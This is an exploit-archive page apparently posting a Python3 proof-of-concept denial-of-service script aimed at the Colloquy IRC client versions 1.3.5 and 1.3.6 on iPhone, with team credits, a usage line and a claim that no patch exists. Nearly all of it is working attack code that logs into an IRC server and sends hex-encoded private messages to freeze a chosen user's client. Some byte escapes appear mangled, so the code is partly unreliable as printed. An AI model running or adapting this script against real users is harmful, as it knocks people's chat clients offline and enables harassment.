[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Colloquy 1.3.5 and 1.3.6 Denial of Service Vulnerability
# Published : 2013-01-10
# Author :
# Previous Title : Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability
# Next Title : Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow
#!/usr/bin/python3
###################################################################################
# Wednesday, January 09, 2013
#
#
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# __ / | _/ __ / ___| |/ _ /
# | || || |_ ___// /_/ > ( <_> ) |
# /_ ~~ _____/___ >___ /|__|____/|___| /
# |_||_| /_____/ /
# http://www.zempirians.com
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
# -=[ Colloquy - A Mac OS X Internet Chat client. ] =-
#
# [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
# # T E A M #
# #######################
#
# UberLame .......> Provided exploit discovery + payloads
# Aph3x .......> Provided main payload attack for this demostration. <3
# O_O .......> Built the concept in Python3
# Apetrick .......> Allowed testing of the exploit against his ipod
# syk .......> Allowed testing of the exploit against his iphone5
#
#
###################################################################################
# SUMMARY #
################
#
# This DOS is designed to freeze the client making it impossible to do anything
# with it. The user will need to manually restart the application in order to
# continue using it.
#
# There are over a few dozen ways to crash the Colloquy client, however, we
# will only be showing 3 various methods. These glitches were suppose to be
# fixed in 'Colloquy' 1.3.5, however, they still exist in the lastest release
# of 1.3.6...
#
################
# VULNERABLE #
################
#
# Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi
# Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi
#
################
# PATCH #
################
#
# There is no CVE reported.
#
################
# PATCH #
################
#
# There is no PATCH available.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
shellcode = {
# One Shot <3
'one_shot' : [
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
# 1.3.5
'1_3_5' : [
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6' : [
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "t[-] Failed To Connect To {}".format( uri ) )
exit()
sock.send( b"x4ex49x43x4bx20x7ax65x6dx70x30x64x61x79x0dx0a" )
sock.send( b"x55x53x45x52x20x7ax65x6dx70x30x64x61x79x20x48x45x48x45x20x48x45x48x45x20x3ax3cx33x0dx0a" )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if ' 396 ' in host_data:
print( 't[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUITrn' )
sock.close()
break
try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}rn".format( msg[1] ) )
continue
except:
pass
print( 't[!] Payload Sent, Target Should Drop Shortly <3' )
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
args = parser.parse_args()
if args.nick is None:
parser.print_help()
exit()
connect( args.target, args.port, args.nick, args.shellcode.strip() )